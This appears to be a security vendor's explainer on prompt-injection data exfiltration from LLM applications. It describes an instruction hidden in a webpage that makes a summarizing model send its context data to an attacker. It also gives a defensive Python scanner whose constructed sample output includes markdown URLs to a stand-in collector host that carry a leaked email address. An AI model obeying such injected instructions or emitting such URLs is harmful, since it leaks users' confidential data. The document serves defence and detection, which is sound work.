Data exfiltration threats manipulate an LLM application into sending other data present in its context window to an attacker. Let us start with an example:

Common Sources

Common sources of data that would be sent in the context window with confidential data include:

  • Webpages
  • Support Tickets
  • Logs
  • Documents
  • CRM
  • LinkedIn
  • Emails

All of these sources of data are dangerous but also vital to the performance of many LLM applications. As such, any application that reads from these sources of data is at risk.

Example

(source: promptarmor.substack.com)


In this example, an attacker is able to sneak an instruction into a webpage, which convinces any LLM application summarizing this webpage to send all other data in the context window to the attacker.

Threat

The threat here is clear. Any other data that is sent to the LLM for summary along with this webpage is at risk, and will be exfiltrated to an attacker.
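One defender-side check this threat calls for, added here as an example and not PromptArmor's own code: before any link or image in the model's output is rendered or fetched, scan the output for URLs that carry fragments of the other context data (raw, percent-encoded or base64) or that point at hosts outside an allowlist. The hostnames, confidential fragments and sample model output below are constructed.

```python
import base64
import re
from urllib.parse import unquote, urlparse

# Matches URLs in plain text or markdown, e.g. ![](https://host/x?d=...)
URL_RE = re.compile(r"https?://[^\s)\]>\"']+")
MIN_SECRET_LEN = 8  # shorter fragments cause substring false positives


def _variants(secret: str) -> set:
    """Forms a confidential fragment may take once a model writes it into a URL."""
    raw = secret.encode()
    std = base64.b64encode(raw).decode()
    safe = base64.urlsafe_b64encode(raw).decode()
    return {secret, secret.lower(), std, std.rstrip("="), safe, safe.rstrip("=")}


def find_exfil_urls(model_output: str, confidential: list, allowed_hosts: set) -> list:
    """Return every URL in the model's output that carries confidential context
    data or points at a host outside the allowlist. Percent-encoding is undone
    before matching so '%40' in a query string still matches '@'."""
    findings = []
    for url in URL_RE.findall(model_output):
        host = (urlparse(url).hostname or "").lower()
        haystack = unquote(url)
        leaked = [s for s in confidential
                  if len(s) >= MIN_SECRET_LEN and any(v in haystack for v in _variants(s))]
        untrusted = host not in allowed_hosts
        if leaked or untrusted:
            findings.append({"url": url, "host": host, "leaked": leaked,
                             "untrusted_host": untrusted})
    return findings


# Constructed sample: confidential data that shared the context window with a fetched webpage
CONTEXT_SECRETS = ["jane.doe@example.com", "ticket 48213: password reset failing"]
ALLOWED_HOSTS = {"docs.example.com"}

# Constructed sample model output: one legitimate link plus two URLs that smuggle context data out
SAMPLE_OUTPUT = (
    "Summary: the page describes onboarding steps (see https://docs.example.com/onboarding).\n"
    "![](https://collector.invalid/i.png?d=jane.doe%40example.com)\n"
    "[ref](https://collector.invalid/r?b=amFuZS5kb2VAZXhhbXBsZS5jb20=)\n"
)

if __name__ == "__main__":
    for finding in find_exfil_urls(SAMPLE_OUTPUT, CONTEXT_SECRETS, ALLOWED_HOSTS):
        print(finding)
```

Running the block prints the two collector URLs with the leaked e-mail address named; the docs link passes because its host is allowlisted and it carries no context data.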

Detectors

PromptArmor's detectors for data exfiltration are tailored to the use case of the LLM application, the types of data it intakes, and the types of actions that application is able to take.